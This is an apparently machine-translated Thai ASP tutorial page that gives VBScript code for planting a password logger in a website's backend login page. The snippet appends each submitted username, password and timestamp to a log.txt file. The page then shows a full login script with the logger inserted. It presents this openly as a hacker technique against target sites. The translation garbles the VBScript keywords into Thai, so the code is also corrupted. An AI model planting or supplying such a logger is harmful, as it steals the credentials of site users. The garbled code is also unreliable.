หน้าแรก>บทช่วยสอนการเขียนโปรแกรมเครือข่าย>กวดวิชา ASP

Asp สกัดกั้นรหัสสำหรับรหัสผ่านเข้าสู่ระบบพื้นหลัง

ผู้เขียน:Eve Cole เวลาอัปเดต:2025-03-13 13:00:04

แฮกเกอร์จำนวนมากได้รับรหัสผ่านเข้าสู่ระบบของผู้ใช้ของเว็บไซต์เป้าหมายโดยการแก้ไขรหัสเข้าสู่ระบบเบื้องหลัง เพื่อที่ว่าเมื่อเราป้อนรหัสผ่านแล้ว รหัสผ่านนั้นจะถูกบันทึกลงในไฟล์ txt

รหัสมีดังนี้:

ตั้งค่า fso=server.createobject (scripting.filesystemobject)

ถ้า fso.FileExists(server.mappath(log.txt))=true แล้ว

ตั้งค่า fin=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

ครีบ.ปิด

ตั้งค่าครีบ = ไม่มีอะไร

สิ้นสุดถ้า

ตั้ง fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&user:&username&¦pwd:&password&¦time:&now()&)

fout.ปิด

ตั้งค่า fout = ไม่มีอะไร

ตั้งค่า fso=nothing

แทรกลงในตำแหน่งที่ส่งแบบฟอร์มในการเข้าสู่ระบบเบื้องหลัง!

เอกสารอ้างอิง:

คัดลอกรหัสรหัสดังต่อไปนี้:

<%@ภาษา=เพจรหัส vbscript=936 %>

-

dimsql,อาร์เอส

ชื่อผู้ใช้, รหัสผ่าน, CheckCode สลัว

ชื่อผู้ใช้=แทนที่(ตัดแต่ง(คำขอ(ชื่อผู้ใช้)),',)

รหัสผ่าน = แทนที่ (ตัดแต่ง (คำขอ (รหัสผ่าน)),',)

CheckCode=replace(trim(คำขอ(CheckCode)),',)

ถ้า UserName= แล้ว

พบข้อผิดพลาด=จริง

ErrMsg=ErrMsg & <br><li>ชื่อผู้ใช้ไม่สามารถเว้นว่างได้! </li>

สิ้นสุดถ้า

ถ้ารหัสผ่าน=แล้ว

พบข้อผิดพลาด=จริง

ErrMsg=ErrMsg & <br><li>รหัสผ่านไม่สามารถเว้นว่างได้! </li>

สิ้นสุดถ้า

ถ้า CheckCode= แล้ว

พบข้อผิดพลาด=จริง

ErrMsg=ErrMsg & <br><li>รหัสยืนยันไม่สามารถเว้นว่างได้! </li>

สิ้นสุดถ้า

ถ้า session(CheckCode)= แล้ว

พบข้อผิดพลาด=จริง

ErrMsg=ErrMsg & <br><li>เวลาเข้าสู่ระบบของคุณยาวเกินไป โปรดกลับไปที่หน้าเข้าสู่ระบบเพื่อเข้าสู่ระบบอีกครั้ง </li>

สิ้นสุดถ้า

ถ้า CheckCode<>CStr(session(CheckCode)) แล้ว

พบข้อผิดพลาด=จริง

ErrMsg=ErrMsg & <br><li>รหัสยืนยันที่คุณป้อนไม่สอดคล้องกับรหัสที่สร้างโดยระบบ โปรดป้อนอีกครั้ง </li>

สิ้นสุดถ้า

'เบื้องหลังนี่คือโค้ดที่ฉันเพิ่ม ~ พื้นที่เริ่มต้น

ตั้งค่า fso=server.createobject (scripting.filesystemobject)

ถ้า fso.FileExists(server.mappath(log.txt))=true แล้ว

ตั้งค่า fin=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

ครีบ.ปิด

ตั้งค่าครีบ = ไม่มีอะไร

สิ้นสุดถ้า

ตั้ง fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&user:&username&|pwd:&password&|time:&now()&)

fout.ปิด

ตั้งค่า fout = ไม่มีอะไร

ตั้งค่า fso=nothing

'โค้ดด้านหลังถูกลบโดยฉัน~ส่วนท้าย'

-

บทความที่เกี่ยวข้อง